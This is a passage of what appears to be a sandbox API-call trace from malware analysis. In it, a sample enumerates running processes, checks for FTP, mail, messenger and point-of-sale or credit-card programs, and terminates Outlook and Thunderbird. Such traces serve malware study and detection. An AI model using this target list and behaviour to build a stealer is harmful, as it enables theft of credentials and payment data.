th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.204] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0127.205] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0127.206] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0127.206] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0127.207] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0127.208] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0127.208] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.209] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.210] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.210] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.211] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.211] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0127.212] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.213] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.213] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0127.214] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0127.215] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0127.215] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0127.216] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0127.217] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x370, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0127.217] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="tool-penn-atomic.exe")) returned 1 [0127.218] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x76c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="session-eden.exe")) returned 1 [0127.218] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="resolve problems friendly.exe")) returned 1 [0127.219] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="motivationdealers.exe")) returned 1 [0127.220] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="licenses.exe")) returned 1 [0127.220] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spyware.exe")) returned 1 [0127.221] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="western.exe")) returned 1 [0127.221] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="tomatoes.exe")) returned 1 [0127.222] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bumper-norfolk.exe")) returned 1 [0127.223] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="cet.exe")) returned 1 [0127.223] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x788, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="works.exe")) returned 1 [0127.224] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="effect.exe")) returned 1 [0127.225] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="avonsavingselvis.exe")) returned 1 [0127.225] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="friendshiprb.exe")) returned 1 [0127.226] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ty_thickness.exe")) returned 1 [0127.227] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="learning.exe")) returned 1 [0127.227] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="implications transcripts.exe")) returned 1 [0127.252] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="nd spending.exe")) returned 1 [0127.253] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="marshall alphabetical offices.exe")) returned 1 [0127.253] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="blues.exe")) returned 1 [0127.254] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0127.255] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0127.256] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x620, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0127.256] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0127.257] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0127.258] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0127.258] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0127.259] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0127.260] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0127.261] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0127.261] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0127.262] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x71c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0127.263] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0127.263] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0127.264] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0127.265] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0127.266] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0127.268] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0127.269] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x844) returned 0xb0 [0127.269] TerminateProcess (hProcess=0xb0, uExitCode=0xffffffff) returned 1 [0127.273] CloseHandle (hObject=0xb0) returned 1 [0127.273] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0127.274] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0127.275] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0127.277] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0127.278] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0127.279] OpenProcess (dwDesiredAccess=0x1, bInheritHandle=0, dwProcessId=0x894) returned 0xb0 [0127.279] TerminateProcess (hProcess=0xb0, uExitCode=0xffffffff) returned 1 [0127.280] CloseHandle (hObject=0xb0) returned 1 [0127.280] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="totalcmd.exe")) returned 1 [0127.281] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0127.282] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0127.283] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0127.285] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0127.286] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0127.287] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x904, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0127.288] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0127.289] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0127.290] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x934, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0127.365] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0127.366] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0127.367] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0127.368] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x974, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0127.368] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x984, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0127.369] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x994, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0127.370] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0127.370] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0127.371] Process32NextW (in: hSnapshot=0x10c, lppe=0x18fcdc | out: lppe=0x18fcdc*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x454, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0127.372] 